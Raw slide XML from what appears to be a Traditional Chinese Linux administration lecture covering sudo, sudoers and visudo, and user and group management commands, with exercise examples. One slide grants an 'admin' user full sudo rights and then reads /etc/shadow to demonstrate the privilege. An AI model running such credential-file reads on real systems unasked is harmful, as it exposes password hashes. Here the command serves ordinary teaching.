            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>若密碼輸入成功，便開始進行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後續接的指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>執行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，不須輸入密碼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a: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4104803"/>
      </p:ext>
    </p:extLst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4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>若切換的身份與執行者身份相同，也不需要輸入密碼</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>重點</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="新細明體"/>
                <a:ea typeface="新細明體"/>
              </a:rPr>
              <a:t> 「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>能否使用</a:t>
            </a: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必須看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sudoers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>的設定值，而可使用</a:t>
            </a:r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者是透過輸入使用者自己的密碼來執行後續的指令串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="新細明體"/>
                <a:ea typeface="新細明體"/>
              </a:rPr>
              <a:t>」</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/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4104803"/>
      </p:ext>
    </p:extLst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sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>的配置都記錄在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 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>sudoers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>檔案中，配置檔案指明哪些使用者可以執行哪些指令。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>sudoers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>檔案中的基本配置格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>如上方圖示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="14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516889"/>
      </p:ext>
    </p:extLst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visudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>vi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>將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udoers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>檔案乎交出來進行修改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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>visudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>新新增</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>進</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>sudoers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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>root@localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>~]#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>visudo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root      ALL=(ALL)     ALL (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>預設值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>admin   ALL=(ALL)     ALL←</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>新增</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>admi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5168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6131894"/>
      </p:ext>
    </p:extLst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建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>完畢後試試</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>admin@localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>~]#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t> tail –n 1 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shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>發現</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>居然可以查詢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>shadow!</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="14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516889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useradd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>：新增一個使用者帳號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useradd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使用者帳號名稱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u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：指定一個使用者一個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>UID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>-g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：指定初始群組</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>GID(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>必須存在的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>gid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>-M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：只建立使用者，不建立家目錄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m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：建立家目錄</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>-d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>：指定使用者家目錄</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="360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4839279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groupadd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>：新增一個群組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smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>groupadd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群組名稱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g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：後面接某個特定的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>GID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>，用來直接給予某個 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>GID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>-r : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>建立系統群組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8087874"/>
      </p:ext>
    </p:extLst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usermod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>可以修改一個使用者帳號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usermod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群組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使用者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g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：後面接初始群組，修改 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd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的第四個欄位，也是是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>GID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>的欄位。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>-G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：後面接次要群組，修改這個使用者能夠支援的群組，修改的是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>/group </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>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l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：只修改使用者名稱</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3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10217049"/>
      </p:ext>
    </p:extLst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usermod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>可以修改一個使用者帳號</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>格式：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>usermod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>參數</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>群組</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>參數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g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：後面接初始群組，修改 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passwd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的第四個欄位，也是是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>GID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>的欄位。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>-G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：後面接次要群組，修改這個使用者能夠支援的群組，修改的是 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group </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>。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l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：只修改使用者名稱</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1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003652"/>
      </p:ext>
    </p:extLst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userdel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>可以刪除一個使用者帳號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userdel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使用者帳號名稱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r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：連使用者家目錄一起刪除</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3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3566414"/>
      </p:ext>
    </p:extLst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groupdel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>可以刪除一個群組</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>格式：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>groupdel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>  [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>群組名稱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3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16148771"/>
      </p:ext>
    </p:extLst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passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>指令能對指定帳號的用戶設置密碼，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>用戶能修改系統中所有用戶的密碼，而普通用戶只能變更自己的密碼。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>格式：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>  [ID]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> 或 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>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58864569"/>
      </p:ext>
    </p:extLst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gpasswd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>指令可以讓某個群組具有一個管理員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smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>gpasswd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使用者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群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A  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：將 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>groupname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的主控權交由後面的使用者管理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>該群組的管理員</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>-a  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：將某位使用者加入到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>groupname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這個群組當中！</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>-d  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：將某位使用者移除出 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>groupname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這個群組當中。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2869948"/>
      </p:ext>
    </p:extLst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gpasswd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>指令可以讓某個群組具有一個管理員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smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>gpasswd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使用者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群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M  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：將某些帳號加入這個群組當中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r  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：將 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>groupname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的密碼移除。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>-R  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：讓 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>groupname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的密碼欄失效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35869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5701755"/>
      </p:ext>
    </p:extLst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useradd -g users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>csie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>2.useradd -u 510 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>csii</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>3.groupadd test (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>系統給的值為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:GID:511)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 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-g test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>csib</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>4.useradd -M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>csil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0827655"/>
      </p:ext>
    </p:extLst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groupadd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>cyut</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>usermod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -g </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>cyut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sie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>group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yuu</a:t>
            </a:r>
            <a:r>
